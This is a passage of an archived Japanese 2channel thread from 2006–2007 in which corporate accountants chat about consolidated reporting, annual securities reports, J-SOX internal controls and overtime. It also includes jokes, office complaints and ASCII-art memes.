うちは10社だから真面目に相殺してるけど

154 :名無しさん@そうだ確定申告に行こう:2006/10/21(土) 16:06:07 ID:6ACWo+tx
オワタ\(^o^)/

155 :名無しさん@そうだ確定申告に行こう:2006/10/21(土) 22:58:21 ID:OFVElrW9
>>154
中間?おつかれさんでした

156 :名無しさん@そうだ確定申告に行こう:2006/10/24(火) 22:46:30 ID:7uWYozfS
修正報告はじまた

157 :名無しさん@そうだ確定申告に行こう:2006/10/26(木) 19:20:17 ID:xhrHjfSJ
一息つけるな

158 :名無しさん@そうだ確定申告に行こう:2006/10/26(木) 21:23:59 ID:Tjl7OFpT
会計士使えない

159 :名無しさん@そうだ確定申告に行こう:2006/10/28(土) 19:57:49 ID:8OPhyR6k
だい3四半期はじまるな・・・


160 :名無しさん@そうだ確定申告に行こう:2006/10/28(土) 22:59:09 ID:s9Yyxe5J
j-sox絡みで仕事が増えた。

161 :名無しさん@そうだ確定申告に行こう:2006/11/03(金) 23:09:02 ID:ZllKqeA3
減損は従来よりも厳しくチェックされたなー。
会社が作成した将来CFを会計士の立場でよく批判できるものだ。


162 :名無しさん@そうだ確定申告に行こう:2006/11/03(金) 23:59:53 ID:ItuRU10k
>>161
で、税務調査で「こりゃ損金に落としすぎ」と言われ追徴課税になると。

163 :名無しさん@そうだ確定申告に行こう:2006/11/04(土) 13:22:17 ID:9Apm4EOB
きちんと否認しろよ

164 :名無しさん@そうだ確定申告に行こう:2006/11/04(土) 15:31:56 ID:brVc8zAU
最初経理に移動してきたとき、一般職の女と部長が避妊だなんだ言ってるのみて慌てたもんだ

165 :名無しさん@そうだ確定申告に行こう:2006/11/20(月) 20:23:13 ID:QT0OM8Zr
友邦作成してる経理のひとって、
どんくらいもらってるんですか?
やっぱ普通の経理マンよりは年収上ですか?

166 :名無しさん@そうだ確定申告に行こう:2006/11/21(火) 21:32:51 ID:i0bpp2pP
んなわけありますかいな。

167 :名無しさん@そうだ確定申告に行こう:2006/11/23(木) 08:13:41 ID:e72sSD4N
>>165
うちは派遣に全部やらせてる

168 :名無しさん@そうだ確定申告に行こう:2006/11/23(木) 22:13:32 ID:qHpZZ1wz
>>167
派遣向きの業務とは思えませんが..........?????



169 :893:2006/11/23(木) 23:43:50 ID:xegMl7Xu
数字に対しての責任の問題がネック、有報は短信が細かくなっただけなので指示すれば派遣にも割り当てられられなくはない。

170 :名無しさん@そうだ確定申告に行こう:2006/11/24(金) 22:55:50 ID:nFjRJaV9
>有報は短信が細かくなっただけ
そうだっけか?

171 :名無しさん@そうだ確定申告に行こう:2006/11/24(金) 23:25:26 ID:nxQxuTuO
>>169
そう、機械的にやらせる分にはまったく問題ない

172 :名無しさん@そうだ確定申告に行こう:2006/11/25(土) 00:13:52 ID:OP39kJoP
ユウホウを派遣にやらせちまったら、正社員は何やってるの?

173 :名無しさん@そうだ確定申告に行こう:2006/11/25(土) 09:29:29 ID:qCzZMQNI
基本的に、忙しそうにして、
派遣に威張って、早くやれよ! 
間違いを見つけたら、アホバカと罵る。

174 :名無しさん@そうだ確定申告に行こう:2006/11/25(土) 09:34:04 ID:qCzZMQNI
上司は、忙しそうにデイトレ三昧
中途祭用面接で、出来そうな奴だったら落とす。
採用になったら、無茶な仕事を押付けて退職させる。


175 :名無しさん@そうだ確定申告に行こう:2006/11/25(土) 15:59:51 ID:FysZ2uIj
監査法人の連結ソフト使ってる人います?
どんな感じがぜんぜんわからないんだけど、
子会社とネット回線つないで一気に連結て感じですか?

それとも、もう月次で連結しちゃってて、
経営管理もソフト使って連結ベースでしてるとか・・・・

想像はひろがりんぐどすえ

176 :名無しさん@そうだ確定申告に行こう:2006/11/26(日) 00:54:46 ID:0t8JVhV/
>>174
どこも同じなんだな

177 :名無しさん@そうだ確定申告に行こう :2006/11/26(日) 02:15:14 ID:tfpGNCQu
>>174
マジ?そんなことしたらボンクラばっかになって
職場がだるくてだるくて仕方ないじゃん。

178 :174:2006/11/26(日) 09:09:01 ID:yjq59xR7
マジだよ
役員クラスがそういった連中の集まりだからね。
どうしても、その子飼は同じタイプの者しかいつかない。
そうやって、自分達のポジションを維持するんだよな。

過去には、部下の大量離脱を経験しているだよね。
それでも、退職していった部下が悪いと社長に言い放つ。
自分は社長のお気に入りだから大丈夫なんだそうです。

こんな会社に投資している株主が可哀相。
まぁ 業績は赤字続きです。



179 :名無しさん@そうだ確定申告に行こう :2006/11/26(日) 12:12:54 ID:tfpGNCQu
>>178
やはり歴史の浅い新興上場?
社長は技術または営業だけで管理ができない人?

180 :174:2006/11/26(日) 14:14:43 ID:yjq59xR7
歴史はそれなりにある。
ただし、同族だからね。
不満分子の粛清は定期的にあるよ。

社長の経歴や言動をみても、何が得意なのか分らない。
自分が分らない分野に対しても、自ら判断を下さないと
気にくわない性格みたいです。

やり手気取りの無能社長さんがいる会社は、
漫画以下の事件が続出している。

当然、管理は出来ないから、子飼役員に任せている。
その子飼役員が、その部下に管理を委譲している。


181 :名無しさん@そうだ確定申告に行こう:2006/11/26(日) 16:06:03 ID:syVBBF89
どこもそんなもんなんですか・・・。
うちも似たような環境ですよ。
ほんとに、漫画のような世界です。
無用な精神論が先行する会社なんです。

182 :名無しさん@そうだ確定申告に行こう :2006/11/26(日) 20:05:32 ID:tfpGNCQu
>>180 不満分子の粛清は定期的にある

露骨に解雇?左遷したり給料下げて自発的に転職させるの?

183 :名無しさん@そうだ確定申告に行こう:2006/11/27(月) 22:04:52 ID:lca62MrW
俺の会社は、管理部門は残業代が付かない・・・

184 :180:2006/11/28(火) 18:43:24 ID:DdGpcxtD
>>182
割増で給料を払う気がありません。
当然、後者の方法です。

また、今回も粉飾しちゃった・・・


185 :名無しさん@そうだ確定申告に行こう:2006/12/10(日) 12:16:42 ID:i5GkyqMh
間違いに誰も気づきませんように
ってかEDINET見てる奴なんているのか?

186 :名無しさん@そうだ確定申告に行こう:2006/12/12(火) 21:06:54 ID:HzfBoaIi
新人なので見て勉強させてもらってます。
でも、あれを控除し忘れてるのが数社あるのはさておき、
Aのケアレスミスは職業柄よろしくない。
その他その他。

187 :名無しさん@そうだ確定申告に行こう:2006/12/12(火) 22:32:13 ID:NGMr7YBU
>>186
A?

188 :名無しさん@そうだ確定申告に行こう:2006/12/17(日) 09:03:53 ID:5e4fXtPU
SOX法の準備大変ですか?
どなたか教えてください。


189 :名無しさん@そうだ確定申告に行こう:2006/12/17(日) 09:45:48 ID:/OYkdnOO ?2BP(52)
手探り段階だから企業によってまちまちだろうけど、
社内監査の人間が理想型を押し付けるスタイルだと、
迂闊に「対応します、対応できてます」と言うと、後々破綻する、かも。

190 :名無しさん@そうだ確定申告に行こう:2006/12/20(水) 01:02:44 ID:NCb/Nz5v
ずっと同じ道を歩んでいいのか不安な人いない?まったり生きていきたいのに一生まったりできそうにない。職業病ですかねぇ

191 :名無しさん@そうだ確定申告に行こう:2006/12/20(水) 02:26:48 ID:R2JbY/zp
2月の証取委の強化 4月のSOX
日本の会計監査は来年より厳しくなりそうな流れ
米国の働きかけでSEC並みの基準を目指しそうです
上場企業の会計監査の方は乙であります

192 :名無しさん@そうだ確定申告に行こう:2006/12/20(水) 02:30:31 ID:R2JbY/zp
基準とは会計監査への監視基準であります
機能してないのが日本ですが来期5月からそーいってられんのであります

193 :名無しさん@そうだ確定申告に行こう:2006/12/21(木) 18:49:43 ID:nyTU9iMF
まだまだ 粉飾の手口はあるでござる!

194 :名無しさん@そうだ確定申告に行こう:2006/12/21(木) 22:42:39 ID:siSGO1YH
上場企業の経理なら開示関係と税務関係のどちらが将来性あるかな?

195 :名無しさん@そうだ確定申告に行こう:2006/12/21(木) 23:03:01 ID:/92eytC8
みなさんお疲れ様です。
子供にはさせたくない仕事ですね。


196 :名無しさん@そうだ確定申告に行こう:2006/12/24(日) 10:19:14 ID:HyEoeRLI
今年もしょうも無い1年だった

197 :名無しさん@そうだ確定申告に行こう:2006/12/27(水) 18:39:30 ID:RCtfg7NV
株主優待として自社製品を贈呈している会社の方教えてください。
交際費にならない(広告宣伝費)ということでよろしいでしょうか?
板違いかもしれませんが、アドバイスお願いします。

198 :名無しさん@そうだ確定申告に行こう:2006/12/27(水) 21:46:56 ID:wcZ27LGJ
広告宣伝費だと、資本と資産の取引に該当するんでねーの?w

199 :名無しさん@そうだ確定申告に行こう:2006/12/27(水) 22:10:29 ID:WOpZjp1H
↑ってどういう意味? 販管費で処理する以外ないものと思っていましたが。

200 :名無しさん@そうだ確定申告に行こう:2006/12/28(木) 16:07:55 ID:3k2/WpfV
>>197
販管費でOK。
基本のキホンですが損金計算上
交際費じゃ×。

201 :名無しさん@そうだ確定申告に行こう:2006/12/28(木) 23:10:36 ID:ALYwCL/t
>>197
自社製品なら他勘定振替ですよ。

202 :名無しさん@そうだ確定申告に行こう:2006/12/29(金) 12:33:38 ID:skF64fIy
有報作成ツールは宝とプロネクどっちが優れモノ?
XBRLを考慮するとやっぱ宝かな?

203 :名無しさん@そうだ確定申告に行こう:2006/12/30(土) 15:32:30 ID:1b5TzGWU
12月決算の俺には大晦日も正月も無い

204 :名無しさん@そうだ確定申告に行こう :2006/12/30(土) 16:42:00 ID:DXtRwK0C
>>203
1月1日出社?

205 :名無しさん@そうだ確定申告に行こう:2006/12/30(土) 23:04:33 ID:9jeG5pPN
>>203
ウチもだ。正月休みはそこそこあるけど、明けたら終了のお知らせ。

206 :名無しさん@そうだ確定申告に行こう:2006/12/31(日) 08:27:15 ID:UWZQN1O/
>>204
今日も出社ですが何か?


207 :名無しさん@そうだ確定申告に行こう:2006/12/31(日) 20:14:59 ID:UWZQN1O/
ただいま
なんで暖房効いてないんだよ
殺すきか

208 :名無しさん@そうだ確定申告に行こう :2007/01/01(月) 02:47:34 ID:zDQzbtGV
>>206
12/31はやはり棚卸しで現場だったんですか?
12月決算の経理マンは大変だな〜。

209 :名無しさん@そうだ確定申告に行こう:2007/01/01(月) 23:50:29 ID:kQQ3833b
>>208
帰ってきた
お笑いウルトラクイズ見られなかったYO(;´Д`)

210 :名無しさん@そうだ確定申告に行こう:2007/01/03(水) 14:20:57 ID:eP4tAwnx
>>209
それは残念
今回の人間性クイズは、かつてのポール牧と上島竜兵
より、秀逸だったよ。

211 :名無しさん@そうだ確定申告に行こう:2007/01/07(日) 11:04:09 ID:qCdAa2E1
内部統制どうしてる?

212 :名無しさん@そうだ確定申告に行こう :2007/01/07(日) 13:51:48 ID:+vvsUcEs
>>211
俺の会社はプロジェクト・チームすらまだ結成されてないw
後で怒涛の残業に追い込まれるのは必至w

213 :名無しさん@そうだ確定申告に行こう:2007/01/07(日) 15:09:42 ID:WUmwlk3G
うちなんか結成の噂すら無いし、その上決算期変更がある。
死ねということらしい、、、orz

214 :名無しさん@そうだ確定申告に行こう:2007/01/07(日) 16:31:24 ID:xFBrsJsD
俺は最近転職して内部統制チームに入りました。
まだスケジュールとかToDoとかを練ってる段階。

215 :名無しさん@そうだ確定申告に行こう:2007/01/08(月) 08:24:24 ID:OQh7ZLhe
SOX法
零細の監査法人なら、どう監査するんだろう・・・
会計監査もザルなのに・・・

216 :名無しさん@そうだ確定申告に行こう:2007/01/08(月) 13:18:34 ID:69hEutOn
ザルならいいじゃん。うるさいこと言われなくてさ。
零細ならどうせ最後はこっちのいいなりなんだから。


217 :名無しさん@そうだ確定申告に行こう:2007/01/08(月) 13:31:53 ID:LOyyI2EZ
内部統制はスタート後ろ倒しか適当に繕った形になるだろうから
そんな急いでやる必要ないよ

218 :名無しさん@そうだ確定申告に行こう:2007/01/08(月) 19:14:30 ID:2ow7Zz6g
内部統制か。
会計士はほっとしてるかもね。
食い扶持が増えて。

219 :名無しさん@そうだ確定申告に行こう:2007/01/08(月) 21:09:08 ID:u0t/lufF
>>215
合併すんじゃね?そんな動きがあるらしいよ。

>>218
人手が足りないらしいよ。

220 :名無しさん@そうだ確定申告に行こう:2007/01/14(日) 16:47:11 ID:8lmYRDJx
おまいら生きてるか?

221 :名無しさん@そうだ確定申告に行こう:2007/01/16(火) 20:36:28 ID:HlGYGYGY
へんがない ただのしかばねのようだ

222 :名無しさん@そうだ確定申告に行こう:2007/01/16(火) 21:50:55 ID:2vFx7hRw
>>221
IDがなんかすごいな

223 :名無しさん@そうだ確定申告に行こう:2007/01/16(火) 23:04:06 ID:xloz6oQ2
監査法人って感じ悪いね。

224 :名無しさん@そうだ確定申告に行こう:2007/01/16(火) 23:19:17 ID:0JBVvj9s
向こうもお前を感じ悪いと思ってるんじゃね?

225 :名無しさん@そうだ確定申告に行こう:2007/01/17(水) 20:43:03 ID:L5F2dzvp
内部統制Seminar行ってきた。

内部統制やってたら防げたはずの粉飾なんてあるのかよ。
つかれる

226 :名無しさん@そうだ確定申告に行こう:2007/01/17(水) 21:47:14 ID:gfSdhq76
俺は来週内部統制セミナーに行く予定。
講師に質問したいことがてんこ盛りだ。

粉飾やる会社は内部統制も粉飾するので、
結局意味ないだろうな。


227 :名無しさん@そうだ確定申告に行こう:2007/01/17(水) 22:16:09 ID:Z/VgaUil
内部統制は経営者による不正に対しては十分機能しないというのは既に知られていることだな。
どちらかというと、いままでよくあった「従業員が勝手にやった。俺は知らない」という言い逃れをさせないためのものだろ。

228 :名無しさん@そうだ確定申告に行こう:2007/01/18(木) 03:53:36 ID:qPSxEeiW
あ、そーゆー事なのね。
久々に2chで良い知恵もらった。
ありがd

229 :名無しさん@そうだ確定申告に行こう:2007/01/18(木) 08:29:27 ID:DVOUVbNk
>>227
それはわかる。でも、ただそのために、全上場企業とその子会社が
へたすりゃ億に達するような金を吐き出すなんて…

230 :名無しさん@そうだ確定申告に行こう:2007/01/18(木) 15:09:04 ID:k5B+/u7L
>>453
お前さんのいいたいことはよくわかるし同感なんだが、アメちゃんがSOX導入したときの理屈ってのが、

エンロンやワールドコムなどが破綻したときの損害(1社だけで)>>>>>>>全上場会社の導入コスト

だからな。実際そのとおりだし、しょうがない面もある。

231 :名無しさん@そうだ確定申告に行こう:2007/01/18(木) 23:15:56 ID:qPSxEeiW
ロングパスだなー

232 :名無しさん@そうだ確定申告に行こう:2007/01/18(木) 23:52:45 ID:TLKhOq0H
すまん。20のせいでアンカーが狂ってしまった。

233 :名無しさん@そうだ確定申告に行こう:2007/01/19(金) 02:46:19 ID:J6S76whF
話が折れるかもしれないが一つ聞かせてくれ。スレタイは連結・有報だがみんな有報やってるか?財務だと書けないことも多くね?んで、有報作ってるのって多分IRか総務だと思うんだが力関係ってどうよ?うちは財務(連結)とIR互角って感じなんだが。

234 :名無しさん@そうだ確定申告に行こう:2007/01/19(金) 23:59:54 ID:G2sr25ZT
>>230
その理屈はおかしい。
内部統制を導入しても、
第二のエンロンが起こる確率はほとんど変わらないから。

所詮、気休め。
怪しげな魔よけの購入を強制されているようで、不快だ。

っていうかもうきついんだよ。
早く帰らせてくれよ。。

235 :名無しさん@そうだ確定申告に行こう:2007/01/20(土) 00:05:50 ID:6NNeTH6a
>>233
気の利いた総務のいる会社がうらやましいさ。

236 :名無しさん@そうだ確定申告に行こう:2007/01/20(土) 09:18:49 ID:dOQKBNW7
>>233
総務の連中は人事バカと庶務の低脳だけだ。ウチでは。


237 :名無しさん@そうだ確定申告に行こう:2007/01/21(日) 16:22:04 ID:+QLDH54z
ちょww営業利益一桁間違えてたwwwwwwww

238 :名無しさん@そうだ確定申告に行こう:2007/01/21(日) 16:26:47 ID:2o754u00
誰も困ってないならいいんじゃねーの?w

239 :名無しさん@そうだ確定申告に行こう:2007/01/22(月) 23:17:49 ID:sFsVDxtt
>>233
うちは経理がIRも有報もなんでもやってるよ
総務じゃ絶対無理

>>237
あるあるwwwww

240 :名無しさん@そうだ確定申告に行こう:2007/01/23(火) 11:05:26 ID:2AksOHCg
>>237
粉飾キタコレ

241 :名無しさん@そうだ確定申告に行こう:2007/01/26(金) 19:28:08 ID:ZliJjgj5
経済産業省からシステム管理基準追補版が出たけど、
すげーお粗末な内容だった。
全然参考にならない。

あと、誤字が多いし、2ちゃんだったら「日本語でおk」とか
言われそうな文が至るところにある。
もうちょっとちゃんとしたの出せよ。

242 :名無しさん@そうだ確定申告に行こう:2007/01/26(金) 21:58:45 ID:D0Ii7eeM
そういえば「日本語でおk」の「おk」ってなんなんだろう?

243 :名無しさん@そうだ確定申告に行こう:2007/01/26(金) 22:04:41 ID:nTzWPmai
「お書きください」の略称というか、書きかけみたいなもの
とどこかのスレで見た希ガス


244 :名無しさん@そうだ確定申告に行こう:2007/01/26(金) 23:11:46 ID:VCSgep5A
OKのことだろ
UPをうpと言ったりするし。

245 :名無しさん@そうだ確定申告に行こう:2007/01/26(金) 23:23:52 ID:RlfVKDi2
>>242
これが元ネタ。「日本語で大丈夫だよ」という意味。これのバリエーションでイクラちゃんネタもある(2コマ目がバブバブーとかいうやつ)。


ウルトラマンに悩みを相談しよう
1 名前:('A`)[] 投稿日:2005/05/20(金) 21:05:58
    /    ||    :ヽ
   ┌|(⌒ヽ :|| ..:⌒: |┐   / ̄ ̄ ̄ ̄ ̄ ̄ ̄
   |::|::ヽ.__:):||(___ノ ::|::|  │
    |:|: ..   :||    .. |:|  │
    :|: ..   ||    ..|| <   ジュワ!
     :\ [_ ̄] /::|   │
::     |\|_|_|_|_/:::|    \________
   __| |   / / :|___


2 名前:('A`)[] 投稿日:2005/05/20(金) 21:06:49
ジュワワワジュワワ、
ジュワジュワジュジュワワワワワ?

3 名前:('A`)[] 投稿日:2005/05/20(金) 21:07:27
    /    ||    :ヽ
   ┌|(⌒ヽ :|| ..:⌒: |┐   / ̄ ̄ ̄ ̄ ̄ ̄ ̄
   |::|::ヽ.__:):||(___ノ ::|::|  │
    |:|: ..   :||    .. |:|  │
    :|: ..   ||    ..|| < >>2日本語でおk
     :\ [_ ̄] /::|   │
::     |\|_|_|_|_/:::|    \________
   __| |   / / :|___


246 :名無しさん@そうだ確定申告に行こう:2007/01/27(土) 00:30:25 ID:BOBeodDd
>>245
     ::|
     ::|    ____
     ::|.  ./|=|    ヽ.    ≡三< ̄ ̄ ̄>
     ::|. / |=|  o  |=ヽ     .≡ ̄>/
     ::|__〈 ___  ___l   ≡三/ /
     ::|、ヽ|.|┌--、ヽ|/,-┐|    ≡/  <___/|
     ::|.|''''|.\ヽ--イ.|ヽ-イ:|  ≡三|______/
     ::|.ヾ |.::. .. ̄ ̄| ̄ /
     ::|  ';:::::┌===┐./
     ::| _〉ヾ ヾ二ソ./       こ、これは乙じゃなくてスラッガーなんだから
     ::||ロ|ロ|  `---´:|____    変な勘違いしないでよね!

247 :名無しさん@そうだ確定申告に行こう:2007/01/28(日) 01:09:31 ID:Kr9WyDCG
>>242は電車男読んでないのか…

248 :名無しさん@そうだ確定申告に行こう:2007/01/28(日) 09:56:36 ID:wh+a3XME
電車男は読んでないな。
ドラマでちょこっと見た。

249 :名無しさん@そうだ確定申告に行こう:2007/01/28(日) 13:27:20 ID:Kr9WyDCG
>>248
電車男がエルメスと電話しながらレスに実況カキコするときにtypoで「OK」のことを「おk」って打つんだよ
それが始まりじゃないかな

250 :名無しさん@そうだ確定申告に行こう:2007/01/28(日) 13:32:02 ID:wh+a3XME
電話しながら実況カキコとな。
ずいぶん余裕かますじゃねーか。
俺だったら電話だけに集中するけどな。

251 :名無しさん@そうだ確定申告に行こう:2007/02/13(火) 08:31:34 ID:4PBk8TZ2
そして時は動き出す

252 :名無しさん@そうだ確定申告に行こう:2007/02/24(土) 00:22:32 ID:iKQCTAtk
連結パッケージを使うかエクセルなどでやるか、
境目って何社くらいを連結する場合なんでしょうか。
うちは2社100%連結なんで、エクセルで余裕ですが、
100社連結なんてパッケージが無いと無理だと思います。
パッケージもきっと高額なんでしょうし。

253 :名無しさん@そうだ確定申告に行こう:2007/02/24(土) 01:04:04 ID:RWhZnDan
営業数値が15日過ぎても固まらない会社の四半期はどうすればいいんですか?

254 :名無しさん@そうだ確定申告に行こう:2007/02/24(土) 07:17:33 ID:ktr0VsL6
死ぬまで働け!

255 :名無しさん@そうだ確定申告に行こう:2007/02/24(土) 11:56:29 ID:J+O3VmpV
>>252
うち8社連結、2社持分適用だけどEXCELじゃ無理
STRAVIS使ってる

256 :名無しさん@そうだ確定申告に行こう:2007/02/24(土) 12:24:05 ID:nLvZN9r1
>>253
決算期を一ヶ月前にずらしたうえで
いわゆる「3ヶ月ルール」の適用

257 :名無しさん@そうだ確定申告に行こう:2007/02/24(土) 16:19:29 ID:9+QFEcoQ
>256
それは営業部門をわざわざ連結子会社にするということでつか?

258 :名無しさん@そうだ確定申告に行こう:2007/02/26(月) 21:10:13 ID:mH/B1oW3
固定資産の残存価額、どうする予定?
うちでは19年3月期で一括償却する予定なんだけど。
次年度以降事務処理が大変そうなんで。。。

259 :名無しさん@そうだ確定申告に行こう:2007/02/26(月) 22:34:24 ID:Fv2KtJvS
うちも備忘価額まで落とすよ。
今後5%になる事業年度に備忘価額に落とすらしい。
気にしているのは申告調整が延々と続くことかな、スレ違いだけど。





260 :名無しさん@そうだ確定申告に行こう:2007/02/27(火) 00:51:07 ID:ssU146KA
1円になったら有姿除去して自己否認するのはどう?

261 :名無しさん@そうだ確定申告に行こう:2007/03/03(土) 12:28:58 ID:qJgCEZ4m
>>258-260
一括償却は会計上微妙というか認められなくなりそう。

53 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)